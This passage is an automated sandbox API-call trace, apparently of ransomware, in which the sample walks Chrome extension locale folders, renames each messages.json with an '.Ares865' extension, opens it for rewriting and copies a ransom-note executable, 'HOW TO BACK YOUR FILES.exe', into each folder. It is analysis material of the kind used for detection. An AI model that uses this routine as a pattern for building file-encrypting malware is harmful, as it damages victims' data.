(lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0101.242] GetLastError () returned 0x0 [0101.242] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0101.242] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sk\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x827e4be0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e48f2e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e48f2e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0101.242] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0101.242] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0101.242] lstrcpyW (in: lpString1=0x2cce51e, lpString2="messages.json" | out: lpString1="messages.json") returned="messages.json" [0101.242] lstrlenW (lpString="messages.json") returned 13 [0101.242] lstrlenW (lpString="Ares865") returned 7 [0101.243] lstrcmpiW (lpString1="es.json", lpString2="Ares865") returned 1 [0101.243] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sk\\messages.json.Ares865") returned 164 [0101.243] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sk\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sk\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sk\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sk\\messages.json.ares865"), dwFlags=0x1) returned 1 [0101.244] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sk\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sk\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0101.244] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=671) returned 1 [0101.247] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ru", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ru") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ru" [0101.247] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ru" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ru") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ru" [0101.247] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0101.247] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ru\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ru\\how to back your files.exe"), bFailIfExists=1) returned 0 [0101.248] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0101.248] GetLastError () returned 0x0 [0101.248] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0101.248] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ru\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x827c7720, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e48f2e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e48f2e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0101.248] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0101.248] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0101.249] lstrcpyW (in: lpString1=0x2cce51e, lpString2="messages.json" | out: lpString1="messages.json") returned="messages.json" [0101.249] lstrlenW (lpString="messages.json") returned 13 [0101.249] lstrlenW (lpString="Ares865") returned 7 [0101.249] lstrcmpiW (lpString1="es.json", lpString2="Ares865") returned 1 [0101.249] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ru\\messages.json.Ares865") returned 164 [0101.249] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ru\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ru\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ru\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ru\\messages.json.ares865"), dwFlags=0x1) returned 1 [0101.250] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ru\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ru\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0101.250] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=783) returned 1 [0101.253] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ro", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ro") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ro" [0101.253] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ro" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ro") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ro" [0101.254] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0101.254] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ro\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ro\\how to back your files.exe"), bFailIfExists=1) returned 0 [0101.254] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0101.254] GetLastError () returned 0x0 [0101.255] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0101.255] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ro\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x827b3ea0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e4b5440, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e4b5440, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0101.255] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0101.255] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0101.255] lstrcpyW (in: lpString1=0x2cce51e, lpString2="messages.json" | out: lpString1="messages.json") returned="messages.json" [0101.255] lstrlenW (lpString="messages.json") returned 13 [0101.255] lstrlenW (lpString="Ares865") returned 7 [0101.255] lstrcmpiW (lpString1="es.json", lpString2="Ares865") returned 1 [0101.255] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ro\\messages.json.Ares865") returned 164 [0101.255] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ro\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ro\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ro\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ro\\messages.json.ares865"), dwFlags=0x1) returned 1 [0101.256] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ro\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ro\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0101.257] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=668) returned 1 [0101.259] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pt_PT", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pt_PT") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pt_PT" [0101.260] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pt_PT" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pt_PT") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pt_PT" [0101.260] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0101.260] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pt_PT\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pt_pt\\how to back your files.exe"), bFailIfExists=1) returned 0 [0101.260] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0101.261] GetLastError () returned 0x0 [0101.261] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0101.261] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pt_PT\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x827aa260, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e4b5440, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e4b5440, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0101.261] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0101.261] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0101.261] lstrcpyW (in: lpString1=0x2cce524, lpString2="messages.json" | out: lpString1="messages.json") returned="messages.json" [0101.261] lstrlenW (lpString="messages.json") returned 13 [0101.261] lstrlenW (lpString="Ares865") returned 7 [0101.261] lstrcmpiW (lpString1="es.json", lpString2="Ares865") returned 1 [0101.261] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pt_PT\\messages.json.Ares865") returned 167 [0101.261] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pt_PT\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pt_pt\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pt_PT\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pt_pt\\messages.json.ares865"), dwFlags=0x1) returned 1 [0101.263] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pt_PT\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pt_pt\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0101.263] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=661) returned 1 [0101.268] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pt_BR", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pt_BR") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pt_BR" [0101.268] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pt_BR" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pt_BR") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pt_BR" [0101.268] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0101.268] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pt_BR\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pt_br\\how to back your files.exe"), bFailIfExists=1) returned 0 [0101.269] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0101.269] GetLastError () returned 0x0 [0101.269] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0101.269] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pt_BR\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x827a2d30, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e4b5440, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e4b5440, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0101.269] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0101.269] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0101.269] lstrcpyW (in: lpString1=0x2cce524, lpString2="messages.json" | out: lpString1="messages.json") returned="messages.json" [0101.269] lstrlenW (lpString="messages.json") returned 13 [0101.269] lstrlenW (lpString="Ares865") returned 7 [0101.269] lstrcmpiW (lpString1="es.json", lpString2="Ares865") returned 1 [0101.270] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pt_BR\\messages.json.Ares865") returned 167 [0101.270] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pt_BR\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pt_br\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pt_BR\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pt_br\\messages.json.ares865"), dwFlags=0x1) returned 1 [0101.271] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pt_BR\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pt_br\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0101.271] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=667) returned 1 [0101.274] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pl", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pl") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pl" [0101.274] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pl" | out: 